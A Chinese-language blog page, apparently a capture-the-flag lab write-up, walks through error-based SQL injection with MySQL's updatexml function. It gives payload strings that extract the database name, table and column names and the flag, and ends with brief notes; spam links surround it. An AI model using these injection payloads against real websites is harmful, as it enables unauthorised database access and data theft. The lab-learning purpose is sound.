当前位置: 首页 > news >正文

温州市建设工程质量监督站网站东莞做网站的联系电

news 2025/9/18 15:50:53
温州市建设工程质量监督站网站,东莞做网站的联系电,网站admin密码忘记了怎么办,go语言做网站进入靶场 按照提示输入1 显示查询正确 既然是报错注入,先判断整形还是字符型注入 先输入1 and 11 再输入1 and 12 都显示查询正确,可知此为字符串型注入,不是数字型注入 然后就不会了 求助AI和其他wp 由以上2张搜索结果知updatexml是适用…

进入靶场

按照提示输入1

显示查询正确

既然是报错注入,先判断整形还是字符型注入

先输入1 and 1=1

再输入1 and 1=2

都显示查询正确,可知此为字符串型注入,不是数字型注入

然后就不会了

求助AI和其他wp

由以上2张搜索结果知updatexml是适用于字府串型注入的函数,且知道大概用法,开始注入

爆出库名          1 and updatexml(1,concat(0x7e,database()),3)

爆出表名                 1 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='sqli')),3)

爆出字段名           1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='flag')),3)

 并没有显示字段名,添加了库名后才显示,应该是含有多个flag表,添加库名缩小了范围便显示出来了

1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='sqli' and table_name='flag')),3)

爆出字段内容        1 and updatexml(1,concat(0x7e,(select group_concat(flag)from sqli.flag)),3)

得到flag

笔记

1,报错注入先判断是字府串型注入还是数字注入

2,判断出类型便可运用相关函数

3,updatexml函数

 1 and updatexml(1,concat(0x7e,database()),3)

第一个与第三个参数随便写,因为我们并不用它,参数2处的concat 是一个用于连接字符串的函数,0x7e代表16进制,避免特殊字符造成的错误

http://www.yayakq.cn/news/618307/

相关文章:

  • 浙江专业做网站微信小程序开发技术栈
  • 中山学校网站建设施工合同
  • 哈尔滨做网站企业网站后台管理软件
  • 多合一网站源码wordpress 类别 排序
  • 厦门网站建设有限公司广东成都网站建设推广公司
  • 网站图片标题背景怎样做的使用cdn的网站
  • 网站设计作业平台用ps如何做模板下载网站
  • 德州网站推广学网站开发月薪多少钱
  • 网站怎么做扫码微信支付济宁百姓网免费发布信息网
  • 做网站优化的协议书jsp网站有哪些
  • 关键词优化搜索引擎班级优化大师免费下载电脑版
  • 网站实名认证资料安福网站建设
  • cms wordpress模板制作网站免费优化平台
  • 了解深圳网站定制开发网站建设结论及体会
  • wap网站建设方案.tv可以做门户网站不
  • wap网站生成系统wordpress is archive
  • 长沙seo工作室seo黑帽技术工具
  • 浙江网站建设自助建站优化佛山高端外贸网站建设
  • php 做视频网站网站设计三原则
  • 做网站的项目介绍网站建设明细报价表
  • 网站模板 阿里北京工商网上登记申请平台
  • 建设局网站作用网站建设和管理规则
  • 免费微信建站有哪些网站注册企业邮箱要钱吗
  • 可以访问国外网站的dns厦门响应式网站
  • 好听的网站名称什么平台可以发广告引流
  • 网站如何提交百度收录白云手机网站开发
  • dedecms 网站访问量化妆品企业网站建设
  • 黄石企业网站设计怎么设置网址
  • 网站的功能模块视频网站开发项目
  • 网站模板怎么修改教程wordpress前端投稿